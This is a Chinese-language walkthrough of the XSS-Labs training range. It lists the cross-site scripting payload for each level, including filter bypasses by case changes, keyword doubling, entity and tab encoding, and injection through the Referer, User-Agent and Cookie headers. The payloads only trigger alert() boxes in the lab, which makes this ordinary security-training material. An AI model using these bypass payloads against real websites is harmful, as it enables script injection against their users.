XSS_Labs靶场通关笔记

每一关的方法不唯一;可以结合源码进行分析后构造payload;

通关技巧(四步):

1.输入内容看源码变化;

2.找到内容插入点;

3.测试是否有过滤;

4.构造payload绕过

第一关

构造payload:name=<script>alert()</script>

第二关

构造payload:" οnclick=alert() "

第三关

构造payload:' οnclick=alert() '

第四关

构造payload:" οnclick=alert() "

第五关

构造payload:"><a href="javascript:alert()">123</a>//

第六关

构造payload:" Onclick=alert() "

第七关

构造payload:" oonnclick=alert() "

第八关

在url中构造payload:javascr%09ipt:alert()

也可以用html实体编码替换script中的一个字符来绕过(方法很多,不演示)

第九关

构造payload:javascri&#112;t:alert('http://')

第十关

构造payload:t_sort=" οnclick=alert() type="

第十一关

通过bp抓包修改referer:" οnclick=alert() type="

第十二关

通过bp抓包修改User-Agent: " οnclick=alert() type="

第十三关

通过bp抓包修改Cookie: user=" οnclick=alert() type="

第十四关(坏了,直接略过)

第十五关

构造payload:src="level1.php?name=</h2><h2 οnclick=alert()>123"

第十六关

构造payload:keyword=<input%0Aοnclick=alert()>

对空格进行实体编码了,需要空格绕过

由于浏览器不支持flash,17、18、19、20略过

10

相关推荐
小村儿1 分钟前
连载10-Sub-agents 深度解析:从源码理解 Claude Code 的分身术
前端·后端·ai编程
OSwich33 分钟前
【 Godot 4 学习笔记】命名规范
笔记·学习·godot
IT_陈寒35 分钟前
Vite动态导入把我坑惨了,原来要这样用才对
前端·人工智能·后端
DFT计算杂谈39 分钟前
KPROJ编译教程
java·前端·python·算法·conda
觅_41 分钟前
前端学习后端的时候 选择一个技术
前端·学习
独泪了无痕44 分钟前
CryptoJS:数据安全的JavaScript加密利器
前端·vue.js·node.js
吃吃今天努力学习了吗1 小时前
【大模型入门学习笔记】常见概念总结
笔记·学习
发现一只大呆瓜1 小时前
一文搞懂 Vite 处理CommonJS包、按需编译逻辑及 Rollup 插件兼容规则
前端
Edwardwu1 小时前
写了个y-mxgraph:给 draw.io 接上了 Yjs,顺便解决了部署在 iframe 里的一堆问题
前端·typescript
其实防守也摸鱼1 小时前
软件安全与漏洞--软件安全编码
java·前端·网络·安全·网络安全·web·工具